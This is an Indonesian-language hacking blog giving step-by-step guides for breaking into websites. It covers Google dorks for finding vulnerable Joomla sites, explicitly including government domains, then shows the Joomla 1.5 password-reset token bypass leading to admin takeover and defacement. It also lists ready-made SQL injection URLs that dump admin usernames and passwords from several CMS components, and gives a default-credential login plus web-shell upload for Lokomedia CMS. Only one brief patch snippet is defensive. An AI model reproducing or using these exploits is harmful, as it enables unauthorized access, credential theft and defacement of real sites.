Kamis, 01 Desember 2011

MOVE

Blog ane pindah ke sini aja...
liat ini yaah...
www.zone-cumi.us
Like juga page on facebook nya
Thanks..
Salam Cumi++

Senin, 28 Februari 2011

Reset Joomla Password

=======================================
| Vuln Joomla, Mereset Password Admin |
=======================================
Jika admin belum lagi patch Vuln ini,, kamu sangat bertuah^_^

1) Find Error Site (pakcik Google.com) --> inurl:jos_users" inurl:"index.php

2) Forget A Password --> /index.php?option=com_user&view=reset

3) Its Find E-Mail --> (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)4) Its Find Username --> (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)

5) Its Find Admin Profile --> (username,0x3a,password)

6) Its Find Token --> (0x3a,username,0x3a,email,0x3a,0x3a,activation)

7) Its Find Login/Outlogin --> index.php?option=com_user&view=login

* inurl:"option=com_juser"
* its find error sites, Some Site :-

--> (0x3a,username,0x3a,email,0x3a,0x3a,activation)
--> (0x3a,username,0x3a,email,0x3a,activation)

Notes :-
Copy Paste --> /index... @pun Tukar --> Cth yg ditukar (0x3a,username,0x3a,email,0x3a,activation) Sahaja Pada Address Bar URL Sitenye.

Hacking Joomla 1.5

cara deface situs yang di buat pake joomla.
langkah2 :(Untuk joomla 1.5.X)

1. cari situs yang dibangun menggunakan joomla, minta bantuan paman google. kata kunci: inurl:option=com_user
atau
inurl:option=com_user site:go.id -->khusus untuk situs pemerintah

2. temukan situs target misalnya:
http://www.target.go.id/index.php?option=com_user&view=login&.....dst

3. ganti alamat tersebut sehingga menjadi
http://www.target.go.id/index.php?option=com_user&view=reset&layout=confirm

4. pada form input yang tampil berikan tanda token tanda ' (tanda petik tunggal) lalu klik kirim

5. jika berhasil maka akan keluar form untuk mereset password. masukan password baru sesuai yang kita inginkan

6. klik submit atau enter maka password default administrator joomla akan di rubah

7. langkah selanjutnya masuk ke halaman login administator
alamatnya: http://www.target.go.id/administrator

masukan username : admin
password : (sesuai yang telah kita masukan waktu di reset)

LOGIN berhasil?

8. jika berhasil masuk ke menu Template manajer, cari template yang bertanda bintang dan rubah index.php dengan kode HTML yang kita inginkan

ket: (
a. khusus untuk joomla 1.5.x tepat nya 1.5.0 - 1.5.5 diatas 1.5.5 gak bisa udah di patch
b. administrator situs belum merubah default user administrator
c. untuk joomla 1.5.x yang belum di patch

cara melakukan Patch joomla supaya tidak bisa di hack seperti cara di atas:

1. buka file yang ada di folder component/com_user/model/reset.php
2. tambahkan script berikut (pada baris 113)

if(strlen($token) != 32) {
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

di bawah script : global $mainframe;

untuk menambah keamanan ganti default user administrator (admin) dengan yang lain.

Joomla SQL Injections

SQL Injection Joomla 1.5

_____________________________________________________________
1. Google dork = allinurl:option=com_user |==========================
[x]. Cek Vuln
site/index.php?option=com_user&view=reset&layout=confirm

[x]. Cek UID n Pass Admin
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=1
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=2
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=3

"sampai muncul tabel informasi"

[x]. Login
Site/administrator
______________________________________________________________________
2. Google dork = allinurl:mod.php?mod=publisher |
==============================
[x]. Cek Vuln
site/mod.php?mod=publisher&op=viewcat&cid=2'

[x]. Cek UID n Pass Admin
site/mod.php?mod=publisher&op=viewcat&cid=-2+union+all+select+1,group_concat(aid,0x3a,name,0x3a,pwd),3+from+authors--

[x]. Login
site/admin.php
______________________________________________________________________
3. Google dork = inurl:com_gameserver |
========================
[x]. Cek Vuln
Site/index.php?option=com_gameserver&view=gamepanel&id=3'

[x]. Cek UID n Pass Admin
site/index.php?option=com_gameserver&view=gamepanel&id=3+union+select+1,2,group_concat(username,char(58),password),4+from+jos_users-–

[x]. Cek Login
site/path/path/path/admin
______________________________________________________________________
4. Google dork = inurl:com_digifolio |
======================
[x]. Cek Vuln
site/index.php?option=com_digifolio&view=project&id=2'

[x]. Cek UID n Pass Admin
site/index.php?option=com_digifolio&view=project&id=-2+union+all+select+1,group_concat(username,char(58),password),3+from+jos_users-–

[x]. Cek Login
site/admin
______________________________________________________________________
5. Google dork = inurl:com_siirler |
====================
[x]. Cek Vuln
site/index.php?option=com_siirler&task=sdetay&sid=
3'

[x]. Cek UID n Pass Admin

site/index.php?option=com_siirler&task=sdetay&sid=
-3+union+all+select+1,2,concat(username,char(58),password),4+from+jos_users–-

[x]. Cek Login
site/admin
______________________________________________________________________
6. Google dork = Powered by PHP Live! v3.3 |
============================
[x]. Cek Vuln
site/message_box.php?theme=&l=[username]&x=[xxx]&deptid=2'

[x]. Cek UID n Pass Admin
site/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-2+union++all+select+1,group_concat(login,char(58),password),3,4,5+from+chat_admin–


[x]. Cek Login
site/admin
______________________________________________________________________
7. Google dork = allinurl:option=com_livechat |
============================
[x]. Cek Vuln
site/administrator/components/com_livechat/getChat.php?chat=0&last=3'

[x]. Cek UID n Pass Admin
site/administrator/components/com_livechat/getChat.php?chat=0&last=-3+union+all+select+1,2,unhex(hex(concat(username,0×3a,password))),4+from+"masih jadi misteri!!"
______________________________________________________________________
8. Google dork = allinurl:com_idoblog |
[x]. Cek Vuln
site/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62'

[x]. Cek UID n Pass Admin
site/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0×3a,username,password)
,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–

[x]. Cek Login
site/administrator

site/index.php?option=com_rsgallery2&Itemid=&page=vote&catid= (SQL Injection Blind)

Hacking CMS lokomedia

CMS Lokomedia atau bisa juga disebut dengan Lokomedia CMS, ada juga saya dengar orang-orang suku maya menyebutnya dengan Suka CMS, CMS Lokomedia ini adalah pemprograman web content management system (CMS) berbasis PHP dan MySQL. CMS ini murni buatan anak bangsa Indonesia, buatan Mas Lukmanul Hakim yang ditulis dan diabadikan dalam buku cetakkan dari Lokomedia yang akhirnya menjadi nama dari CMS ini.
ok langsung aja ya
pada google ketik dork :
Code:
inurl:semua-berita.html

pilih web yg akan di eksekusi
setelah dapat web yg akan di eksekusi cari login adminnya
dengan menambahkan /adminweb

contoh :
www.target.com/adminweb

coba masukkan username & password default'a
username : admin
password : admin

ingat tidak semua user dan password'a default
ok next
setelah masuk pada panel adminnya , kita bisa melihat semua isi dalam web tersebut
nah udah masuk mubajir kalo di diemin aja kn
cari menu download pada panel domain tersebut , terus tambah download untuk menanam shell
setelah upload shell berhasil
lalu pada browser ketikkan
Code:

http://target.com/files/namashell.php

ok selesai ,
sudah masuk dalam web'a kn
sekarang bebas mau di apain tuh web'a

note
kebanyakan yg menggunakan CMS ini adalah web indonesia
Cintai produksi dalem negeri

sumber : http://www.indonesianhacker.or.id/threads/6351-Hacking-cms-lokomedia

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
ReDesign by Cumi++ | Affiliate Network Reviews